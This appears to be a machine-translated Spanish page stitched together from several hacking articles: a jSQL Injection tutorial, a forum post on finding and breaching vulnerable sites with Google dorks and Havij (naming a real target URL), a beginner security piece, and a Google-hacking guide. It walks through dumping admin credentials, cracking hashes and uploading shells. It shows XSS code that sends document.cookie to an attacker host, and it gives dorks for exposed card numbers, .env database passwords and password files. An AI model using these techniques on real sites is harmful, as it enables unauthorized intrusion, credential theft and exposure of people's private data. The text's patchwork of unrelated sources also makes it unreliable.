Instrucciones para usar jSQL Inyección, una herramienta multifuncional para encontrar y explotar inyecciones SQL en Kali Linux. Uso de funciones poco conocidas de Google para encontrar el ID de PHP del comentario Inurl oculto deseado

Ejecute el archivo descargado haga doble clic(Debe tener máquina virtual ).

3. Anonimato al comprobar un sitio en busca de inyección SQL
Configurando Tor y Privoxy en KaliLinux

[Sección en desarrollo]

Configurar Tor y Privoxy en Windows

[Sección en desarrollo]

Configuración de proxy en inyección jSQL

[Sección en desarrollo]

4. Verificar el sitio en busca de inyección SQL con inyección jSQL

Trabajar con el programa es extremadamente sencillo. Simplemente ingrese la dirección del sitio web y presione ENTER.

La siguiente captura de pantalla muestra que el sitio es vulnerable a tres tipos de inyecciones SQL (la información sobre ellas se indica en la esquina inferior derecha). Al hacer clic en los nombres de las inyecciones, puede cambiar el método utilizado:

Además, ya se nos han mostrado las bases de datos existentes.

Puede ver el contenido de cada tabla:

Normalmente, lo más interesante de las tablas son las credenciales de administrador.

Si tiene suerte y encuentra los datos del administrador, es demasiado pronto para alegrarse. Aún necesitas encontrar el panel de administración donde ingresar estos datos.

5. Busque paneles de administración con inyección jSQL

Para hacer esto, vaya a la siguiente pestaña. Aquí somos recibidos con una lista de posibles direcciones. Puede seleccionar una o más páginas para verificar:

La conveniencia radica en el hecho de que no es necesario utilizar otros programas.

Desafortunadamente, no hay muchos programadores descuidados que almacenen contraseñas en texto claro. Muy a menudo en la línea de contraseña vemos algo como

8743b52063cd84097a65d1633f5c74f5

Esto es un hachís. Puedes descifrarlo usando fuerza bruta. Y... la inyección jSQL tiene una fuerza bruta incorporada.

6. Hashes de fuerza bruta mediante inyección jSQL

La indudable comodidad es que no es necesario buscar otros programas. Hay soporte para muchos de los hashes más populares.

Esta no es la mejor opción. Para convertirse en un gurú en la decodificación de hashes, se recomienda el Libro "" en ruso.

Pero, por supuesto, cuando no hay otro programa a mano o no hay tiempo para estudiar, JSQL Inyección con su función de fuerza bruta incorporada te resultará muy útil.

Hay configuraciones: puede establecer qué caracteres se incluyen en la contraseña y el rango de longitud de la contraseña.

7. Operaciones de archivos después de detectar inyecciones SQL

Además de las operaciones con bases de datos (leerlas y modificarlas), si se detectan inyecciones de SQL, se pueden realizar las siguientes operaciones con archivos:

  • leer archivos en el servidor
  • subir nuevos archivos al servidor
  • subiendo shells al servidor

¡Y todo esto se implementa en jSQL Inyección!

Existen restricciones: el servidor SQL debe tener privilegios de archivo. los sensatos administradores de sistemas están discapacitados y tienen acceso a sistema de archivos no podrá conseguirlo.

La presencia de privilegios de archivos es bastante sencilla de comprobar. Vaya a una de las pestañas (leer archivos, crear un shell, cargar un archivo nuevo) e intente realizar una de las operaciones especificadas.

Otra nota muy importante: necesitamos saber la ruta absoluta exacta al archivo con el que trabajaremos; de lo contrario, nada funcionará.

Mire la siguiente captura de pantalla:

Ante cualquier intento de operar sobre un archivo, se nos responde: Sin privilegios FILE (sin privilegios de archivo). Y aquí no se puede hacer nada.

Si en cambio tienes otro error:

Problema al escribir en [nombre_directorio]

Esto significa que especificó incorrectamente la ruta absoluta donde desea escribir el archivo.

Para adivinar una ruta absoluta, al menos necesitas saber Sistema operativo en el que se ejecuta el servidor. Para hacer esto, cambie a la pestaña Red.

Esta entrada (línea Win64) nos da motivos para suponer que estamos tratando con el sistema operativo Windows:

Keep-Alive: tiempo de espera = 5, máx = 99 Servidor: Apache/2.4.17 (Win64) PHP/7.0.0RC6 Conexión: Keep-Alive Método: HTTP/1.1 200 OK Longitud del contenido: 353 Fecha: viernes, 11 de diciembre de 2015 11:48:31 GMT X-Desarrollado por: PHP/7.0.0RC6 Tipo de contenido: texto/html; juego de caracteres = UTF-8

Aquí tenemos algo de Unix (*BSD, Linux):

Codificación de transferencia: fragmentada Fecha: viernes, 11 de diciembre de 2015 11:57:02 GMT Método: HTTP/1.1 200 OK Mantener vivo: tiempo de espera = 3, máximo = 100 Conexión: mantener vivo Tipo de contenido: texto/html X- Desarrollado por: PHP/5.3.29 Servidor: Apache/2.2.31 (Unix)

Y aquí tenemos CentOS:

Método: HTTP/1.1 200 OK Vence: jueves, 19 de noviembre de 1981 08:52:00 GMT Configurar cookie: PHPSESSID=9p60gtunrv7g41iurr814h9rd0; ruta=/ Conexión: keep-alive X-Cache-Lookup: MISS de t1.hoster.ru:6666 Servidor: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.4.37 X-Cache: MISS de t1.hoster.ru Control de caché: sin almacenamiento, sin caché, debe revalidar, verificación posterior = 0, verificación previa = 0 Pragma: sin caché Fecha: viernes, 11 de diciembre de 2015 12:08:54 GMT Codificación de transferencia: fragmentado Tipo de contenido: texto/html; juego de caracteres=WINDOWS-1251

En Windows, una carpeta típica para sitios es C:\Server\data\htdocs\. Pero, de hecho, si alguien "pensó" en crear un servidor en Windows, entonces, muy probablemente, esa persona no ha oído nada sobre los privilegios. Por lo tanto, deberías empezar a intentarlo directamente desde el directorio C:/Windows/:

Como puedes ver, todo salió bien la primera vez.

Pero los propios shells de inyección jSQL me plantean dudas. Si tiene privilegios de archivo, puede cargar algo fácilmente con una interfaz web.

8. Comprobación masiva de sitios en busca de inyecciones de SQL

E incluso esta función está disponible en jSQL injection. Todo es extremadamente simple: descargue una lista de sitios (se puede importar desde un archivo), seleccione aquellos que desea verificar y haga clic en el botón correspondiente para iniciar la operación.

Conclusión de la inyección jSQL

La inyección jSQL es buena, herramienta poderosa para buscar y posteriormente utilizar inyecciones SQL encontradas en sitios web. Sus indudables ventajas: facilidad de uso, funciones relacionadas integradas. jSQL Inyección puede ser el mejor amigo de un principiante al analizar sitios web.

Entre las deficiencias, destacaría la imposibilidad de editar bases de datos (al menos yo no encontré esta funcionalidad). Como ocurre con todas las herramientas GUI, una de las desventajas de este programa se puede atribuir a su imposibilidad de utilizarse en scripts. Sin embargo, también es posible cierta automatización en este programa, gracias a la función incorporada de verificación masiva del sitio.

El programa de inyección jSQL es mucho más conveniente de usar que sqlmap. Pero sqlmap admite más tipos de inyecciones SQL, tiene opciones para trabajar con firewalls de archivos y algunas otras funciones.

En pocas palabras: inyección jSQL - mejor amiga hacker novato.

Puede encontrar ayuda para este programa en la Enciclopedia Kali Linux en esta página: http://kali.tools/?p=706

Y ahora te diré cómo hackear algo sin ningún conocimiento especial. Diré de inmediato que esto tiene pocos beneficios, pero aún así.
Primero, necesita encontrar los sitios mismos. Para hacer esto, vaya a google.com y busque idiotas.

Inurl:pageid= inurl:games.php?id= inurl:page.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:article.php?id= inurl:show.php? id= inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id= inurl:top10.php?cat= inurl:historialeer.php?num= inurl:reagir.php?num= inurl:Stray- Preguntas-View.php?num= inurl:forum_bds.php?num= inurl:game.php?id= inurl:view_product.php?id= inurl:newsone.php?id= inurl:sw_comment.php?id= inurl: news.php?id= inurl:avd_start.php?avd= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl:news_view.php?id= inurl: select_biblio.php?id= inurl:humor.php?id= inurl:aboutbook.php?id= inurl:ogl_inet.php?ogl_id= inurl:fiche_spectacle.php?id= inurl:communique_detail.php?id= inurl:sem. php3?id= inurl:kategorie.php4?id= inurl:news.php?id= inurl:index.php?id= inurl:faq2.php?id= inurl:show_an.php?id= inurl:preview.php? id= inurl:loadpsb.php?id= inurl:opinions.php?id= inurl:spr.php?id= inurl:pages.php?id= inurl:announce.php?id= inurl:clanek.php4?id= inurl:participante.php?id= inurl:descargar.php?id= inurl:main.php?id= inurl:review.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl: prod_detail.php?id= inurl:viewphoto.php?id= inurl:article.php?id= inurl:person.php?id= inurl:productinfo.php?id= inurl:showimg.php?id= inurl:view. php?id= inurl:website.php?id= inurl:hosting_info.php?id= inurl:gallery.php?id= inurl:rub.php?idr= inurl:view_faq.php?id= inurl:artikelinfo.php? id= inurl:detalle.php?ID= inurl:index.php?= inurl:profile_view.php?id= inurl:categoría.php?id= inurl:publicaciones.php?id= inurl:fellows.php?id= inurl :downloads_info.php?id= inurl:prod_info.php?id= inurl:shop.php?do=part&id= inurl:productinfo.php?id= inurl:collectionitem.php?id= inurl:band_info.php?id= inurl :product.php?id= inurl:releases.php?id= inurl:ray.php?id= inurl:produit.php?id= inurl:pop.php?id= inurl:shopping.php?id= inurl:productdetail .php?id= inurl:post.php?id= inurl:viewshowdetail.php?id= inurl:clubpage.php?id= inurl:memberInfo.php?id= inurl:section.php?id= inurl:theme.php ?id= inurl:page.php?id= inurl:shredder-categories.php?id= inurl:tradeCategory.php?id= inurl:product_ranges_view.php?ID= inurl:shop_category.php?id= inurl:transcript.php ?id= inurl:channel_id= inurl:item_id= inurl:newsid= inurl:trainers.php?id= inurl:news-full.php?id= inurl:news_display.php?getid= inurl:index2.php?option= inurl :readnews.php?id= inurl:top10.php?cat= inurl:newsone.php?id= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl :aboutbook.php?id= inurl:preview.php?id= inurl:loadpsb.php?id= inurl:pages.php?id= inurl:material.php?id= inurl:clanek.php4?id= inurl:announce .php?id= inurl:chappies.php?id= inurl:read.php?id= inurl:viewapp.php?id= inurl:viewphoto.php?id= inurl:rub.php?idr= inurl:galeri_info.php ?l= inurl:review.php?id= inurl:iniziativa.php?in= inurl:curriculum.php?id= inurl:labels.php?id= inurl:story.php?id= inurl:look.php? ID= inurl:newsone.php?id= inurl:aboutbook.php?id= inurl:material.php?id= inurl:opinions.php?id= inurl:announce.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:tekst.php?idt= inurl:newscat.php?id= inurl:newsticker_info.php?idn= inurl:rubrika.php?idr= inurl:rubp.php?idr= inurl: oferta.php?idf= inurl:art.php?idm= inurl:title.php?id= inurl:".php?id=1" inurl:".php?cat=1" inurl:".php?catid= 1" inurl:".php?num=1" inurl:".php?bid=1" inurl:".php?pid=1" inurl:".php?nid=1"

Aquí hay una pequeña lista. Puedes usar el tuyo. Y así encontramos el sitio. Por ejemplo http://www.vestitambov.ru/
A continuación, descarga este programa.

**Contenido oculto: para ver este contenido oculto, el número de publicaciones debe ser 3 o más.**

Haga clic en Aceptar. Luego insertamos el sitio de la víctima.
Pulsamos inicio. A continuación esperamos los resultados.
Y así, el programa encontró una vulnerabilidad SQL.

A continuación, descargue Havij, http://www.vestitambov.ru:80/index.php?module=group_programs&id_gp= pegue allí el enlace recibido. No explicaré cómo usar Havij y dónde descargarlo, no es difícil de encontrar. Todo. Ha recibido los datos que necesita: la contraseña de administrador, y luego depende de su imaginación.

PD Este es mi primer intento de escribir algo. Lo siento si algo anda mal

Decidí hablar un poco sobre seguridad de información. El artículo será útil para programadores novatos y aquellos que recién comienzan a participar en el desarrollo Frontend. ¿Cuál es el problema?

Muchos desarrolladores novatos se dejan llevar tanto por la escritura de código que se olvidan por completo de la seguridad de su trabajo. Y lo más importante, se olvidan de vulnerabilidades como las consultas SQL y XXS. También crean contraseñas fáciles para sus paneles administrativos y son sometidos a fuerza bruta. ¿Cuáles son estos ataques y cómo puedes evitarlos?

inyección SQL

La inyección SQL es el tipo de ataque más común a una base de datos, que se lleva a cabo durante una consulta SQL para un DBMS específico. Muchas personas e incluso grandes empresas sufren este tipo de ataques. El motivo es un error del desarrollador al escribir la base de datos y, estrictamente hablando, las consultas SQL.

Es posible un ataque de inyección SQL debido al procesamiento incorrecto de los datos de entrada utilizados en las consultas SQL. Si el ataque de un hacker tiene éxito, corre el riesgo de perder no sólo el contenido de las bases de datos, sino también las contraseñas y los registros del panel administrativo. Y estos datos serán suficientes para apoderarse completamente del sitio o realizarle ajustes irreversibles.

El ataque se puede reproducir con éxito en scripts escritos en PHP, ASP, Perl y otros lenguajes. El éxito de tales ataques depende más de qué DBMS se utiliza y cómo se implementa el script en sí. Hay muchos sitios vulnerables para inyecciones SQL en el mundo. Esto es fácil de verificar. Simplemente ingrese "idiotas": estas son consultas especiales para buscar sitios vulnerables. Éstos son algunos de ellos:

  • inurl:index.php?id=
  • inurl:entrenadores.php?id=
  • inurl:comprar.php?categoría=
  • inurl:artículo.php?ID=
  • inurl:play_old.php?id=
  • inurl:declaración_more.php?decl_id=
  • inurl:id de página=
  • inurl:juegos.php?id=
  • inurl:página.php?archivo=
  • inurl:noticiasDetail.php?id=
  • inurl:galería.php?id=
  • inurl:artículo.php?id=

¿Cómo usarlos? Basta con introducirlos en motor de búsqueda de google o Yandex. El motor de búsqueda le mostrará no sólo un sitio vulnerable, sino también una página sobre esta vulnerabilidad. Pero no nos detendremos ahí y nos aseguraremos de que la página sea realmente vulnerable. Para ello basta con poner detrás el valor “id=1” una frase"'". Algo como esto:

  • inurl:juegos.php?id=1’

Y el sitio nos dará un error sobre consulta SQL. ¿Qué necesita nuestro hacker a continuación?

Y luego necesita este mismo enlace a la página de error. Luego, el trabajo sobre la vulnerabilidad en la mayoría de los casos se lleva a cabo en la distribución "Kali Linux" con sus utilidades para esta parte: introducir código de inyección y realizar las operaciones necesarias. Cómo sucederá esto, no puedo decírtelo. Pero puedes encontrar información sobre esto en Internet.

Ataque XSS

Este tipo de ataque se realiza sobre archivos Cookies. A los usuarios, a su vez, les encanta guardarlos. ¿Por qué no? Que hariamos sin ellos? Después de todo, gracias a las Cookies, no tenemos que introducir la contraseña de Vk.com o Mail.ru cien veces. Y son pocos los que los rechazan. Pero en Internet a menudo aparece una regla para los piratas informáticos: el coeficiente de conveniencia es directamente proporcional al coeficiente de inseguridad.

Para implementar un ataque XSS, nuestro hacker necesita conocimientos de JavaScript. A primera vista, el lenguaje es muy simple e inofensivo, ya que no tiene acceso a los recursos de la computadora. Un hacker sólo puede trabajar con JavaScript en un navegador, pero eso es suficiente. Después de todo, lo principal es ingresar el código en la página web.

No hablaré en detalle sobre el proceso de ataque. Sólo te diré los conceptos básicos y el significado de cómo sucede esto.

Un hacker puede agregar código JS a algún foro o libro de visitas:

documento.ubicación.href =”http://192.168.1.7/sniff.php?test”

Los scripts nos redireccionarán a la página infectada, donde se ejecutará el código: ya sea un sniffer, algún tipo de almacenamiento o un exploit, que de alguna manera robará nuestras Cookies del caché.

¿Por qué JavaScript? Porque JavaScript es excelente para manejar solicitudes web y tiene acceso a cookies. Pero si nuestro script nos lleva a algún sitio, el usuario lo notará fácilmente. Aquí el hacker utiliza una opción más astuta: simplemente ingresa el código en la imagen.

Img=nueva imagen();

Img.src=”http://192.168.1.7/sniff.php?”+document.cookie;

Simplemente creamos una imagen y le asignamos nuestro script como dirección.

¿Cómo protegerse de todo esto? Es muy sencillo: no hagas clic en enlaces sospechosos.

Ataques DoS y DDos

DoS (del inglés Denegación de Servicio - negación de servicio) - ataque de piratas informáticos en un sistema informático con el objetivo de provocar que falle. Esta es la creación de condiciones bajo las cuales los usuarios de buena fe del sistema no pueden acceder a los servicios proporcionados. los recursos del sistema(servidores), o este acceso es difícil. Un fallo del sistema también puede ser un paso hacia su control si, en una situación de emergencia, el software produce información crítica: por ejemplo, una versión, parte del código del programa, etc. Pero la mayoría de las veces esto es una medida de presión económica: la pérdida de un servicio simple que genera ingresos. Las facturas del proveedor o las medidas para evitar un ataque afectan significativamente al "objetivo" en el bolsillo. Actualmente, los ataques DoS y DDoS son los más populares, ya que permiten que casi cualquier sistema falle sin dejar evidencia legalmente significativa.

¿Cuál es la diferencia entre ataques DoS y DDos?

DoS es un ataque creado de una manera inteligente. Por ejemplo, si el servidor no verifica la exactitud de los paquetes entrantes, entonces un pirata informático puede realizar una solicitud que tardará una eternidad en procesarse y no habrá suficiente tiempo de procesador para trabajar con otras conexiones. En consecuencia, a los clientes se les negará el servicio. Pero de esta manera no será posible sobrecargar o desactivar sitios grandes y conocidos. Están armados con canales bastante amplios y servidores superpotentes que pueden hacer frente a esa sobrecarga sin ningún problema.

En realidad, DDoS es el mismo ataque que DoS. Pero si en DoS hay un paquete de solicitud, entonces en DDoS puede haber cientos o más. Incluso los servidores superpoderosos pueden no ser capaces de hacer frente a tal sobrecarga. Dejame darte un ejemplo.

Un ataque DoS ocurre cuando estás conversando con alguien, pero luego se acerca una persona de malos modales y comienza a gritar fuerte. Es imposible o muy difícil hablar. Solución: llamar a seguridad, quienes se calmarán y sacarán a la persona del local. Los ataques DDoS se producen cuando una multitud de miles de personas de malos modales irrumpen en el lugar. En este caso, la seguridad no podrá atar a todos y llevárselos.

Los ataques DoS y DDoS se llevan a cabo desde ordenadores, los llamados zombies. Se trata de ordenadores de usuarios pirateados por piratas informáticos que ni siquiera sospechan que su máquina está participando en un ataque a ningún servidor.

¿Cómo protegerse de esto? En general, de ninguna manera. Pero puedes ponerle las cosas más difíciles a un hacker. Para ello, es necesario elegir un buen hosting con servidores potentes.

Ataque de fuerza bruta

Un desarrollador puede idear muchos sistemas de protección contra ataques, revisar completamente los scripts que hemos escrito, verificar el sitio en busca de vulnerabilidades, etc. Pero cuando llega al último paso del diseño del sitio web, es decir, cuando simplemente establece una contraseña para el panel de administración, es posible que se olvide de una cosa. ¡Contraseña!

No se recomienda estrictamente establecer una contraseña simple. Podría ser 12345, 1114457, vasya111, etc. No se recomienda establecer contraseñas de menos de 10 a 11 caracteres. De lo contrario, puede verse expuesto al ataque más común y sencillo: la fuerza bruta.

La fuerza bruta es un ataque de contraseña de diccionario que utiliza programas especiales. Los diccionarios pueden ser diferentes: latín, enumeración por números, digamos, hasta un cierto rango, mixtos (latín + números), e incluso hay diccionarios con caracteres únicos @#4$%&*~~`’”\ ? etc.

Por supuesto, este tipo de ataque es fácil de evitar. Basta con crear una contraseña compleja. Incluso un captcha puede salvarte. Además, si su sitio está creado en un CMS, muchos de ellos detectan este tipo de ataque y bloquean la IP. Siempre debes recordar que cuantos más caracteres diferentes haya en una contraseña, más difícil será adivinarla.

¿Cómo funcionan los piratas informáticos? En la mayoría de los casos, sospechan o conocen parte de la contraseña de antemano. Es bastante lógico suponer que la contraseña del usuario no constará de 3 o 5 caracteres. Este tipo de contraseñas provocan frecuentes ataques de piratería. Básicamente, los piratas informáticos toman un rango de 5 a 10 caracteres y agregan varios caracteres que quizás conozcan de antemano. A continuación, se generan contraseñas con los rangos requeridos. La distribución Kali Linux incluso tiene programas para estos casos. Y listo, el ataque ya no durará mucho, ya que el volumen del diccionario ya no es tan grande. Además, un hacker puede utilizar el poder de la tarjeta de video. Algunos de ellos admiten el sistema CUDA y la velocidad de búsqueda aumenta hasta 10 veces. Y ahora vemos que el ataque es así. de una manera sencilla bastante real. Pero no sólo los sitios web están sujetos a la fuerza bruta.

Estimados desarrolladores, nunca se olviden del sistema de seguridad de la información, porque hoy en día muchas personas, incluidos los estados, sufren este tipo de ataques. Después de todo, la mayor vulnerabilidad es una persona que siempre puede distraerse en algún lugar o perderse algo. Somos programadores, pero no máquinas programadas. ¡Esté siempre en guardia, porque perder información puede tener graves consecuencias!

Obtener datos privados no siempre significa piratear; a veces se publican en Acceso público. Conocimiento configuración de google y un poco de ingenio le permitirá encontrar muchas cosas interesantes, desde números de tarjetas de crédito hasta documentos del FBI.

ADVERTENCIA Toda la información se proporciona únicamente con fines informativos. Ni los editores ni el autor son responsables de ningún posible daño causado por los materiales de este artículo.

Hoy en día, todo está conectado a Internet, sin preocuparse por restringir el acceso. Por tanto, muchos datos privados se convierten en presa de los motores de búsqueda. Los robots Spider ya no se limitan a las páginas web, sino que indexan todo el contenido disponible en Internet y añaden constantemente información no pública a sus bases de datos. Descubrir estos secretos es fácil; sólo necesitas saber cómo preguntar sobre ellos.

buscando archivos

En manos capaces, Google encontrará rápidamente todo lo que no se encuentra en Internet, por ejemplo, información personal y archivos para uso oficial. A menudo están escondidos como una llave debajo de una alfombra: no existen restricciones de acceso reales, los datos simplemente se encuentran en la parte posterior del sitio, a donde no conducen enlaces. La interfaz web estándar de Google sólo proporciona ajustes básicos búsqueda avanzada, pero incluso estos serán suficientes.

Puede limitar su búsqueda en Google a un tipo específico de archivo utilizando dos operadores: tipo de archivo y ext. El primero especifica el formato que el motor de búsqueda determinó a partir del título del archivo, el segundo especifica la extensión del archivo, independientemente de su contenido interno. Al buscar en ambos casos, solo necesita especificar la extensión. Inicialmente, el operador ext era conveniente de usar en los casos en que el archivo no tenía características de formato específicas (por ejemplo, para buscar archivos de configuración ini y cfg, que podían contener cualquier cosa). Ahora los algoritmos de Google han cambiado y no hay diferencias visibles entre los operadores; en la mayoría de los casos, los resultados son los mismos.


Filtrar los resultados

De forma predeterminada, Google busca palabras y, en general, cualquier carácter ingresado en todos los archivos de las páginas indexadas. Puede limitar el área de búsqueda por dominio de nivel superior, un sitio específico o por la ubicación de la secuencia de búsqueda en los propios archivos. Para las dos primeras opciones, utilice el operador del sitio, seguido del nombre del dominio o sitio seleccionado. En el tercer caso, todo un conjunto de operadores le permite buscar información en campos de servicio y metadatos. Por ejemplo, allinurl encontrará el indicado en el cuerpo de los enlaces, allinanchor - en el texto equipado con la etiqueta , allintitle - en los títulos de las páginas, allintext - en el cuerpo de las páginas.

Para cada operador existe una versión ligera con un nombre más corto (sin el prefijo todos). La diferencia es que allinurl encontrará enlaces con todas las palabras, e inurl solo encontrará enlaces con la primera de ellas. La segunda palabra y las siguientes de la consulta pueden aparecer en cualquier lugar de las páginas web. El operador inurl también se diferencia de otro operador con un significado similar: el sitio. El primero también le permite encontrar cualquier secuencia de caracteres en un enlace al documento buscado (por ejemplo, /cgi-bin/), que se usa ampliamente para encontrar componentes con vulnerabilidades conocidas.

Probémoslo en la práctica. Tomamos el filtro allintext y hacemos que la solicitud produzca una lista de números y códigos de verificación de tarjetas de crédito que caducan solo en dos años (o cuando sus dueños se cansen de alimentar a todos).

Allintext: fecha de caducidad del número de tarjeta /2017 cvv

Cuando lees en las noticias que un joven hacker “hackeó los servidores” del Pentágono o de la NASA, robando información clasificada, en la mayoría de los casos estamos hablando de una técnica básica de uso de Google. Supongamos que estamos interesados ​​en una lista de empleados de la NASA y su información de contacto. Seguramente dicha lista está disponible en formato electrónico. Por comodidad o por descuido, también podrá estar en la propia página web de la organización. Es lógico que en este caso no existan enlaces al mismo, ya que está destinado a uso interno. ¿Qué palabras puede haber en un archivo así? Como mínimo: el campo "dirección". Probar todas estas suposiciones es fácil.


Inurl:nasa.gov tipo de archivo:xlsx "dirección"


Usamos la burocracia

Hallazgos como este son un buen toque. Una captura verdaderamente sólida proporciona a los webmasters un conocimiento más detallado de los operadores de Google, de la propia Red y de las peculiaridades de la estructura de lo que se busca. Conociendo los detalles, puedes filtrar fácilmente los resultados y refinar las propiedades de los archivos necesarios para obtener datos realmente valiosos en el resto. Es curioso que la burocracia venga al rescate aquí. Produce formulaciones estándar que son convenientes para buscar información secreta filtrada accidentalmente a Internet.

Por ejemplo, el sello de declaración de distribución, obligatorio en la oficina del Departamento de Defensa de EE. UU., significa restricciones estandarizadas en la distribución del documento. La letra A denota comunicados públicos en los que no hay nada secreto; B - destinado únicamente para uso interno, C - estrictamente confidencial, y así sucesivamente hasta F. Se destaca por separado la letra X, que marca información particularmente valiosa que representa un secreto de estado del más alto nivel. Dejemos que quienes deben hacer esto de turno busquen dichos documentos, y nos limitaremos a los archivos con la letra C. Según la directiva DoDI 5230.24, esta marca se asigna a los documentos que contienen una descripción de tecnologías críticas que están bajo control de exportación. . Puede encontrar información tan cuidadosamente protegida en sitios con el dominio de nivel superior .mil, asignado al ejército de EE. UU.

"DECLARACIÓN DE DISTRIBUCIÓN C" inurl:navy.mil

Es muy conveniente que el dominio .mil contenga únicamente sitios del Departamento de Defensa de EE. UU. y sus organizaciones contratadas. Los resultados de búsqueda con restricción de dominio son excepcionalmente claros y los títulos hablan por sí solos. Buscar secretos rusos de esta manera es prácticamente inútil: el caos reina en los dominios.ru y.rf, y los nombres de muchos sistemas de armas suenan a botánicos (PP "Kiparis", armas autopropulsadas "Akatsia") o incluso fabulosos ( TOS “Buratino”).


Al estudiar detenidamente cualquier documento de un sitio en el dominio .mil, podrá ver otros marcadores para refinar su búsqueda. Por ejemplo, una referencia a las restricciones a la exportación “Sec 2751”, que también resulta conveniente para buscar información técnica interesante. De vez en cuando se elimina de los sitios oficiales donde alguna vez apareció, por lo que si no puede seguir un enlace interesante en los resultados de búsqueda, use el caché de Google (operador de caché) o el sitio de Internet Archive.

Subiendo a las nubes

Además de los documentos gubernamentales desclasificados accidentalmente, ocasionalmente aparecen en el caché de Google enlaces a archivos personales de Dropbox y otros servicios de almacenamiento de datos que crean enlaces "privados" a datos publicados públicamente. Es aún peor con los servicios alternativos y caseros. Por ejemplo, la siguiente consulta busca datos de todos los clientes de Verizon que tienen un servidor FTP instalado y utilizan activamente su enrutador.

Allinurl:ftp://verizon.net

Ahora hay más de cuarenta mil personas inteligentes, y en la primavera de 2015 había muchas más. En lugar de Verizon.net, puedes sustituir el nombre de cualquier proveedor conocido, y cuanto más famoso sea, mayor será la captura. A través del servidor FTP integrado, puede ver archivos en un dispositivo de almacenamiento externo conectado al enrutador. Por lo general, se trata de un NAS para trabajo remoto, una nube personal o algún tipo de descarga de archivos de igual a igual. Todos los contenidos de dichos medios están indexados por Google y otros motores de búsqueda, por lo que puede acceder a los archivos almacenados en unidades externas a través de un enlace directo.

Mirando las configuraciones

Antes de la migración generalizada a la nube, los servidores FTP simples gobernaban como almacenamiento remoto, que también presentaban muchas vulnerabilidades. Muchos de ellos siguen siendo relevantes hoy. Por ejemplo, el popular programa WS_FTP Professional almacena datos de configuración, cuentas de usuario y contraseñas en el archivo ws_ftp.ini. Es fácil de encontrar y leer, ya que todos los registros se guardan en formato de texto y las contraseñas se cifran con el algoritmo Triple DES después de una mínima ofuscación. En la mayoría de las versiones, basta con descartar el primer byte.

Es fácil descifrar dichas contraseñas utilizando la utilidad WS_FTP Password Decryptor o un servicio web gratuito.

Hablando de hackear un sitio web arbitrario, generalmente se refieren a obtener una contraseña de registros y copias de seguridad de archivos de configuración de CMS o aplicaciones para comercio electrónico. Si conoce su estructura típica, podrá indicar fácilmente palabras clave. Líneas como las que se encuentran en ws_ftp.ini son extremadamente comunes. Por ejemplo, en Drupal y PrestaShop siempre hay un identificador de usuario (UID) y su correspondiente contraseña (pwd), y toda la información se almacena en archivos con extensión .inc. Puedes buscarlos de la siguiente manera:

"pwd=" "UID=" text:inc.

Revelar contraseñas de DBMS

En los archivos de configuración de servidores SQL, nombres y direcciones Correo electrónico los usuarios se almacenan en texto claro y, en lugar de contraseñas, se registran sus hashes MD5. Estrictamente hablando, es imposible descifrarlos, pero se puede encontrar una coincidencia entre los pares de contraseña hash conocidos.

Todavía hay DBMS que ni siquiera utilizan hash de contraseñas. Los archivos de configuración de cualquiera de ellos se pueden visualizar simplemente en el navegador.

Intexto: DB_PASSWORD tipo de archivo: env

Desde que apareció en servidores windows El lugar de los archivos de configuración fue ocupado parcialmente por el registro. Puede buscar entre sus ramas exactamente de la misma manera, utilizando reg como tipo de archivo. Por ejemplo, así:

Tipo de archivo: reg HKEY_CURRENT_USER "Contraseña"=

No olvidemos lo obvio

A veces es posible acceder a información clasificada con la ayuda de objetos abiertos accidentalmente y atrapados en el campo de visión. datos de google. La opción ideal es encontrar una lista de contraseñas en algún formato común. Almacenar información de la cuenta en Archivo de texto, Documento de Word o electrónico hoja de cálculo de Excel Sólo la gente desesperada puede hacerlo, pero siempre hay suficientes.

Tipo de archivo:xls inurl:contraseña

Por un lado, existen muchos medios para prevenir este tipo de incidentes. Es necesario especificar derechos de acceso adecuados en htaccess, parchear el CMS, no utilizar scripts para zurdos y cerrar otros agujeros. También hay un archivo con una lista de excepciones de robots.txt que prohíbe a los motores de búsqueda indexar los archivos y directorios especificados en él. Por otro lado, si la estructura de robots.txt en algún servidor difiere de la estándar, inmediatamente queda claro lo que están tratando de ocultar en él.

La lista de directorios y archivos de cualquier sitio está precedida por el índice estándar de. Dado que para fines de servicio debe aparecer en el título, tiene sentido limitar su búsqueda al operador del título. Hay cosas interesantes en los directorios /admin/, /personal/, /etc/ e incluso /secret/.

Estén atentos a las actualizaciones

La relevancia es extremadamente importante aquí: las vulnerabilidades antiguas se cierran muy lentamente, pero Google y sus resultados de búsqueda cambian constantemente. Incluso existe una diferencia entre un filtro de “último segundo” (&tbs=qdr:s al final de la URL de solicitud) y un filtro de “tiempo real” (&tbs=qdr:1).

Intervalo de fecha y hora última actualización Google también indica el archivo de forma implícita. A través de la interfaz gráfica web, puede seleccionar uno de los períodos estándar (hora, día, semana, etc.) o establecer un rango de fechas, pero este método no es adecuado para la automatización.

Por el aspecto de la barra de direcciones, solo puedes adivinar una forma de limitar la salida de resultados usando la construcción &tbs=qdr:. La letra y después establece el límite de un año (&tbs=qdr:y), m muestra los resultados del último mes, w - de la semana, d - del último día, h - de la última hora, n - por el minuto, y s - por dame un segundo. Los resultados más recientes que acaba de dar a conocer Google se encuentran utilizando el filtro &tbs=qdr:1 .

Si necesita escribir un script inteligente, será útil saber que el rango de fechas se establece en Google en formato juliano mediante el operador de rango de fechas. Por ejemplo, así es como puedes encontrar una lista de documentos PDF con la palabra confidencial, descargados del 1 de enero al 1 de julio de 2015.

Tipo de archivo confidencial: pdf rango de fechas: 2457024-2457205

El rango se indica en formato de fecha juliana sin tener en cuenta la parte fraccionaria. Traducirlos manualmente del calendario gregoriano es un inconveniente. Es más fácil utilizar un conversor de fechas.

Orientar y filtrar de nuevo

Además de especificar operadores adicionales en la consulta de búsqueda, se pueden enviar directamente en el cuerpo del enlace. Por ejemplo, la especificación filetype:pdf corresponde a la construcción as_filetype=pdf . Esto hace conveniente preguntar cualquier aclaración. Digamos que la salida de resultados solo de la República de Honduras se especifica agregando la construcción cr=paísHN a la URL de búsqueda, y solo de la ciudad de Bobruisk - gcs=Bobruisk. Puede encontrar una lista completa en la sección de desarrolladores.

